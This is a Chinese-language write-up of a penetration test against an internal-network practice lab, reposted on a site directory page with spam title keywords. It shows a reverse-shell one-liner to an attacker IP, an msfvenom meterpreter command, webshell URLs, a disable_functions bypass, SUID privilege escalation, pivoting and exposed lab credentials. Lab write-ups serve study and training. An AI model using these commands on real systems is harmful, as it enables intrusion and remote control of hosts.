日日操夜夜添-日日操影院-日日草夜夜操-日日干干-精品一区二区三区波多野结衣-精品一区二区三区高清免费不卡

公告:魔扣目錄網為廣大站長提供免費收錄網站服務,提交前請做好本站友鏈:【 網站目錄:http://www.ylptlb.cn 】, 免友鏈快審服務(50元/站),

點擊這里在線咨詢客服
新站提交
  • 網站:51998
  • 待審:31
  • 小程序:12
  • 文章:1030137
  • 會員:747

前言

最近在做內網滲透相關姿勢點的總結,打了一些靶場,本次內網網絡拓撲圖如下所示,中等進階難度。

記一次內網靶場滲透測試

 

測試過程

0x1:信息搜集

訪問域名:

記一次內網靶場滲透測試

 

對域名解析的ip進行端口掃描:

nmap -sS --open -Pn -p- -v 192.168.0.122

記一次內網靶場滲透測試

 

對網站進行目錄掃描和指紋識別發現網站使用的是DocCms 2016 x1.

記一次內網靶場滲透測試

 

0x2:漏洞利用

網上搜索doccms 2016歷史漏洞,說搜索功能處參數keyword存在sql注入,使用url二次編碼進行繞過。

記一次內網靶場滲透測試

 

成功獲取到網站admin賬號密碼但無法進行解密:

記一次內網靶場滲透測試

 

從網上下載源碼,發現/setup/checkdb.php文件可以連接遠程的MySQL,所以可以利用mysql的bug讀取文件。

記一次內網靶場滲透測試

 

使用Rogue-MySql-Server讀取文件:

記一次內網靶場滲透測試

 


http://www.ddd4.com/setup/checkdb.php?dbname=mysql&uname=root&pwd=123456&dbhost=192.168.0.109&action=chkdb 這里獲取到了網站的物理路徑。

記一次內網靶場滲透測試

 

查看mysql.log文件,成功讀取到/etc/passwd:

記一次內網靶場滲透測試

 

修改server.py文件中讀取文件的路徑為:

/www/wwwroot/www.ddd4.com/config/doc-config-cn.php

記一次內網靶場滲透測試

 

再次查看mysql.log獲取到數據庫名稱、用戶名、密碼:

www_ddd4.com

www_ddd4_com

x4ix6ZrM7b8nFYHn

記一次內網靶場滲透測試

 

前面端口掃描發現目標機器的3306端口是開放的,直接進行連接:

記一次內網靶場滲透測試

 

連接成功后,替換網站管理員admin賬戶的密碼,查看admin/login.php,發現對密碼使用加密算法進行了加密。

記一次內網靶場滲透測試

 

我們來使用加密算法class.docencryption.php,對123456進行加密。

記一次內網靶場滲透測試

 


4a8dq8y3e7c4a8d09csy9520943dcl64943941se10adc394ujba59abbe5ne057xf20f8y3e7cpwd將加密后的值進行替換。

記一次內網靶場滲透測試

 

使用密碼123456登錄到后臺:

記一次內網靶場滲透測試

 

通過網站查找歷史漏洞,可以使用模版來getshell:

記一次內網靶場滲透測試

 


記一次內網靶場滲透測試

 

這里剛開始寫入普通的一句話木馬,使用蟻劍連接,顯示為空,但是查看phpinfo文件并沒有將eval函數寫入到disable_function當中,換了冰蝎可以連接成功。

記一次內網靶場滲透測試

 

但是無法執行命令,查看disable_function,禁用了很多函數。

記一次內網靶場滲透測試

 

這里使用腳本進行繞過,將文件夾里的.so文件與.php文件上傳到網站的目錄下面:

記一次內網靶場滲透測試

 

然后訪問執行命令:

http://www.ddd4.com/bypass_disablefunc.php?cmd=id&outpath=/tmp/xx&sopath=/www/wwwroot/www.ddd4.com/bypass_disablefunc_x64.so

記一次內網靶場滲透測試

 

直接使用sh反彈shell,反彈成功但是執行命令無反應:

/bin/sh -i >& /dev/tcp/192.168.0.2/3333 0>&1

記一次內網靶場滲透測試

 

使用matespolite生成木馬文件:

msfvenom -p

linux/x86/meterpreter/reverse_tcp LHOST=192.168.0.2 LPORT=4444 -f elf >

/home/kali/Desktop/haha

將木馬文件上傳到目標主機,賦權后執行:

記一次內網靶場滲透測試

 

msf返回一個meterpreter

記一次內網靶場滲透測試

 

使用Python/ target=_blank class=infotextkey>Python返回一個交互式shell

記一次內網靶場滲透測試

 

查看文件獲取到第一個flag

記一次內網靶場滲透測試

 

0x3:提權

使用find進行提權

使用命令find / -type f -perm -u=s 2>/dev/null 發現可以利用find命令來進行提權:

記一次內網靶場滲透測試

 

find . -exec whoami ; -quit 提權成功:

記一次內網靶場滲透測試

 

寶塔提權

翻看文件發現寶塔的賬戶密碼:

記一次內網靶場滲透測試

 

登錄到寶塔上,使用計劃任務進行提權:

記一次內網靶場滲透測試

 


記一次內網靶場滲透測試

 

成功獲取到第二個flag:

記一次內網靶場滲透測試

 

0x4:內網滲透

使用現在的root權限的shell來運行前面我們生產的木馬文件,來獲取一個meterpreter。

記一次內網靶場滲透測試

 

查看路由和hosts文件,發現存在10.10.10.144主機:

記一次內網靶場滲透測試

 

添加路由:

Run autoroute -s 10.10.10.0/24

Run autoroute -p

記一次內網靶場滲透測試

 

設置代理:

記一次內網靶場滲透測試

 

可以訪問http://10.10.10.145:8888說明代理搭建成功。

記一次內網靶場滲透測試

 

使用msf自帶的模塊對10.10.10.144進行端口掃描,發現開放了21、22、80、8080端口:

記一次內網靶場滲透測試

 

瀏覽器代理訪問www.ddd5.com弱口令進入后臺,此站點使用的是emlog,網上搜索歷史漏洞,發現后臺可以通過上傳模版來getshell。

從網上下載一個emlog模版,然后在文件里新建一個php一句話。

記一次內網靶場滲透測試

 

然后將壓縮文件進行上傳安裝:

記一次內網靶場滲透測試

 

上傳成功后,一句話文件的位置為
/content/templates/beginning/haha.php。

記一次內網靶場滲透測試

 


http://www.ddd5.com/content/templates/beginning/haha.php?cmd=id來執行系統命令。

記一次內網靶場滲透測試

 

訪問8080端口:

記一次內網靶場滲透測試

 

使用默認密碼wdlinux.cn無法登錄,對目錄掃描發現存在phpmyadmin使用默認密碼登錄成功,查看wdcpdb數據庫,獲取到admin用戶的密碼。

記一次內網靶場滲透測試

 

對密碼進行md5解密獲取到明文密碼:

記一次內網靶場滲透測試

 

使用密碼進行登錄,發現顯示登錄超時,網上說是時間不同步導致的。

記一次內網靶場滲透測試

 

使用前面的一句話來查看系統當前的時間:

記一次內網靶場滲透測試

 

因為權限不夠,無法修改目標機器的時間,但可以修改自己本地系統時間然后成功登錄。

搜索wdcp利用方法,發現可以執行系統命令,當前用戶為root。

記一次內網靶場滲透測試

 

但是無法使用bash進行反彈,然后考慮的是使用msfvenoom生產一個正向的木馬文件,然后執行木馬文件來上線msf,最后發現也是不行被攔截。

記一次內網靶場滲透測試

 

在安全管理-->ssh管理處生成密碼,并將密鑰下載下來:

記一次內網靶場滲透測試

 

利用proxychains使用ssh直接連接獲取第三個falg。

記一次內網靶場滲透測試

 

總結

在測試過中發現,doccms后臺也可以使用寫入配置文件來拿shell,然后在繞過disable_functions 時,剛開始想的是直接使用蟻劍的插件來繞過,但失敗了,只好手工來繞過disable_functions,也學習了WDCP的利用方法。

分享到:
標簽:滲透 測試
用戶無頭像

網友整理

注冊時間:

網站:5 個   小程序:0 個  文章:12 篇

  • 51998

    網站

  • 12

    小程序

  • 1030137

    文章

  • 747

    會員

趕快注冊賬號,推廣您的網站吧!
最新入駐小程序

數獨大挑戰2018-06-03

數獨一種數學游戲,玩家需要根據9

答題星2018-06-03

您可以通過答題星輕松地創建試卷

全階人生考試2018-06-03

各種考試題,題庫,初中,高中,大學四六

運動步數有氧達人2018-06-03

記錄運動步數,積累氧氣值。還可偷

每日養生app2018-06-03

每日養生,天天健康

體育訓練成績評定2018-06-03

通用課目體育訓練成績評定